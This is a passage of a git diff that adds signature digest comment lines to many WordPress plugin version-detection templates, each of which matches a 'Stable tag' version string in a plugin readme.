b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008a7e991a0a92d3d9009a22ce86901c402771b9e52ba1a8e1a99b2f015fd83ac7022100b5ff099d9879adbe799b5d53c3ec0f0d7739af6bca82c646d88568101570b699:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..24354e9e30 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022045fa856f34668f629b2ddd20035b1ee5993194b4cea83d8f6fa9b852444ea68b022100a02542492890a59d288ccd2bdf7931b743d83842734b1625672cdf64a87cb3e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..11cd377395 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022012c58a8cd15585bdd24369415e0637c759a3fc81fc61bd4bf3fb7c11f652d56d02202dbbafb2afcc5412f1aa7dc8b0d3a4be3f900057d4a579065196649f7649ec85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389d..345ea936ef 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022033e264d480b0a83d82f782d4373cdeab67c8c7f8c1a2be285c6e8205bcfb900502206b10156d2cbb5ee9662b53bffe1cc4d91d413f36048ff66b1c283728b2e0f662:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..9a809f1d39 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220436f09bfa6baf0d000f077e79399147c20176acc40913765c42d6daca99222bb0220568dc937c44a5548bc8358f91ea662b0fa40f78cebf1e29cd8d4e5113e79f8f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..2ef4f60e69 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220584574f247ce3079b97e2c8184e991da88bca937c8163b7aa788021c8149148302201ac3d0ce615820c90561a0c526a346e235e00947b505447c63b3794bd8e60620:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..c4eb2d9929 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dbcb7bbd215b74cd17e9f86c3f1a0645f7efaf972550199266776184a398612a02210087dcb2d08e7037d41b422c5ea780628a08e2908ca91bad54aa4096ec9e826bfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..e52d8d0a43 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008377ed6399aba037976ba2430936c25bbb77b40150787a26902b9f514d35e52e02204578eeff394b710940673e102ce8b3a3cdc700773d53f08346b7db6b9d3d74ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..6cb86b8fb3 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200e474a70a1c048074e3f7437c49e8ef9aeb76d5de7a1adc7c9fb5ff81a665e640221009f2b574c47cb5b39864f31437139a61540a06dda63ce4e3c158ef9c649cf5490:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..ed61ff3570 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210090e6403bb3825ae9215a4a3fe21943c55adeb529c04fd0fbf75dceeed21cac8a022100d6bb1950c4b13d8f9a462bfcfe5c12203d60b129c8d9a836c172e369916e4929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..08aaee8d70 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200933dc202e0241ce1f23140b2e7411615fe76f6013d0f54d2d7746e6dff65c7d02205e4c008c46f52b1f896511b440c84c0b2b94945225772230f03d300802dbd7cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..b26ba69943 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d4aaf8b7d0b5c57d4a5cee015450c3fb96caf96a0265326600d1c557c3ce6a3e022100d184b02675e6be844feb4b689c2101a607b7e46bb0ccf712e41f9a5b9126fed3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..d8de5891bc 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a7a73923978a7063a2e544b08c4399d5e281d65adbe906f114bfc0cd3adbafca02200685be49f3a74b022d357f2b611f0aa35a33e027d1e561d6f9cad44ab74b7e37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..80b4a4283f 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207a442288ea9a01804f9efe5ae1ab3107463b9406a187e0e4dbcf449af00497c7022100ed6edbb64d48c84ed59329550cc0cf995be16c8c3884abad5bac7fd3fe06c0fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..cbb2b6164a 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008b27ef83c3501ebe2ab308acc32f3050456bd45b25c919f5221b32f845d2499502204098f9f2cd685dba7a2588550bd891cee5db745528f6679352bb1108bdac6759:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..24da23121e 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204419bf1063f851ad3abd396688d385276264f67c63ad23a82b477e8df26f2e4e0221008f234759bf8caeed9a8996d1967cb1cffd9f0ad01121a0986a1a74572ab4010b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..61597f9ae7 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008d1f594b89a3c06670642076e14b78000918b2d0a6c7d6e7d9d3bbe64f85c4af02202e23f67c3694cf4c915c8a72bb7127cf0a2b97ea22af8958458beb0d90c03714:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..9d328dff91 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fa6fa34ef2879134613ad259af410ee56a733c5fd5d9b9dea8a213b919e7768502207e199952cb609922b009b12c90f5d8365f14acd5d54c2d9a1ca873b699f08711:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..e5fb1f24da 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022026f2622687dd90537db55699816c0eac8be0db93cf21ea0eb983392fc2b1dcaf02202b82394b4374fce90d61e02a3eabee044ce98109c35d000fc6e466603c11c465:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..c7f738b24a 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220492ccae6d40f497ea5a5b00b174666a3972c16cf5a8a6b71506fd724c3b5e00902207766291ce496a22f7360ec2edb816a7ebc3501f94abc2d9979d52482746cc41b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..14455b8252 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022006551632ea8f4db53d2999482070dc8056227d0c88b7284343aa283ed0369b12022100d866b591828332f8a89bfbe1462867f961be5a9639d06546651b3a8eb8defce3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..53ee2b0664 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022073be6357d17634ca159c6862fd367dcbbd7af2919cbac3323e4166e712513c2902204d4336c960a9b77fda3f9897f6e752d976c5584df54b81869562e589ad339fee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..c1975a2d7d 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022010bea65701ee27bd82423bbdfec579f2b5614fdc447184d3a0e468f41641c23a022100d68ce2121c07ee7fa4980d2bff182cb9241024eca300f84772f468c674d1c524:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..a888f23eef 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b94a4acf3e12f4727ca0943ce7cab493f7eba516ee3c4980df4cbc392473eb04022004cd090307064cbfa4a6d05c6bd63bfc94cd94899d87b0ba48abab653d0876da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..66a9eea197 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dc5426805b5293dc87b651b21361368b93a9b8fdce5210b3e3ef15c56cc5c3fc02206a6e99179fa00de3786cb3368bed7dd263cd47289ff418a7bd35995d32a5fa2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c20ed6552a..9d778fc83c 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e520ee8d0520bc7a5e38411359be74b0e6d02d6bec8bc6b906a15f32e0a0b99e022100a120e8addd00577b4af13b051442c5b390e5c3a2b34c5607b7ac870276cd9c80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..20ebeee95a 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008cbcf953304d3966efae0278c2a039c2d2d5f0636b40a6b78f646de65d5a60e602203a2d653fed437934bdcd2e37f790719b4cb1792f2a5bce5a482ba4a6416a8a0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..33610cdee4 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022058e55eea02ea9780ea4ba23146a58d2d50ab50289b9203fdca86c48c6bbcb1f902204958c8c47f888dff201bcfa96cfcc572c2e5f05644f0e44acb71890476612489:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..fed08f1e08 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008c2c638fa4a623eefa9fbf8508c3c5cde857c8f2214a4077e340d92d129b8b1c022075a96aeb1f678ab863232f09d95f735e60678744c9068c04d211ffb3c9ebecaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 38391bd9f3..d8ecc03a14 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220038e81775071471f6244c5f2dfe27aad7c0749729311c69c32b5eacbb476810102200b2ab5af23bec15ee366067715a484fa5a5aee46709958b4d007ba0034929390:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..481440773a 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e32d99fec3109c7f1908ecc913f05ec257e17dfde4d49ee59d9a948e50e533c9022100aefde97b4aafce6320cb430aed45b3520459f0a1fec41de938a450ba325edf99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..1f379765c4 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206229834af53d186074e0ef38d4efff4c7d022c6f1c36aea300b9326723db7b3d02206be14c131a9be07cdfc4ce5e6f54f74c6d830ca3648aa77779657dfc19283b9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..1b931e20f6 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c673104b82f1f63bff85085dc26e2d4a29c1946e1dac53badf2aff74a67d6f59022100e6d1423eb97a61c416aee183d2f572b32a37d147033ff5f4395d01a1a7482d3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..a35fbad9f1 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022033d48ebeed69bd2fcc64cc6878bffb431c9f508f7c7dfe2e56177710fb4417d102206d5b490bb367daea0df16e151d493c99ebbffd01262f081e88dd64129955448f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..dc952ad484 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a21a145b17804f2a422e2a48040fe19642d182e7797a0797d2942b49e6f19713022057368ae02fd0fc59a63950a00138e2bdf2c0171ab08656abc8b5dcc3d0c41466:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 3e1e79e004..a0374923c5 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c94d4d8dd6501eca9acf876438040fda5cd605a87cf2f6f0ef07b8648c2be921022046cf863b83724cb15f99eab4b79b36d86af3d7f8c39ea4f29414cc05f3f08fae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..0310b9a492 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100efd5cde0b5afecd65f980e382dda7025dd0212d3a128ca16f1dc44428edb35fc022056f4516f3102ba0e02b4b856d63e1bf7cb53c5b6ecea0914b4b6c39af1758ad2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..ebab153099 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220016e618ef353820f93a8a51b650cc1532e076800e01b14481aefb6c1f6628b08022100ae1835e1fefd7bd87f0ec3088844f5286c4be0113ea419f814fd55a4ce72eff7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..41ba734e69 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220647c84c474911482afda0eea0c325eaf0391f85c04aa3eb8361e552e24b98267022033a8ceee18ca3187a62c5e8c620c4bc773e1caabc9c61f9ddd638714ad735b43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..2d4c6d1f4e 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203a8d74f69398ff83314b673ec62bb2073a0fe9126841c7e829e3a1ffef0432e5022100d7dad0a2787f444c6b971f346f5dcf62b8f4637a5fad7870fa7691f015f08471:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..294d24b32b 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220311a593c2f9cc2f1ef262bc874455d45f94b752b83346bace45fde1c3cd85be302204aeb9cf7ff836835b03118032b2de1ef9c068582dce990324ff3a3caabfbe405:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..92700096e2 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203786682c0dcb5f6005f888b7bea718c453bab682cdab40b6072a6321875a5eb3022045a2bf52e559a92768d49356f6384a8b00f5daf2fe59ed2c5802d0eeee752257:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..999cd4c7a7 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022002b0545eca335e1cc42ce210b337991b24b01ed0b59f735ee862c90517fc65fd0220251a34850d220485225d14597d22789d25fdea0be384208cca7130fa8e8a9ae9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..6afe10db65 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220418be0a3686a3b4047715ffe0ca038dd5700cf38b2769179f6984fb0dcd961fd022030b3068b251dfaccf0ffdff7f3d0f04f2133875d9f764901c6f5c166dd66c5ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..a570d5b40f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022002d14973aaaf7e250778a21eb2dfe8e83b6fcb0960f20179e81ec297faef5eea02201b2551d5657b8d5e08785cad84b645e5fbafebe7270e0c183b86e995329d09a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..06448d4756 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bf41f6f23f5974487dc6dff982426f8fdac00fea0dfd96d79a2afba0608bf429022077741c7f3cfc0bd757864a295c1640c8cc13c2814ef0ff830d3b4619c96c2751:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..a2bdd1ff1c 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203213376663758f8cd7d3e2fd0e31da619eafab0115d76d85ff30be1cfec93a48022100d9a54a0f1585072f6962a575371e71aa3744da5d72b6eebfcf52b4d0361d0249:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml 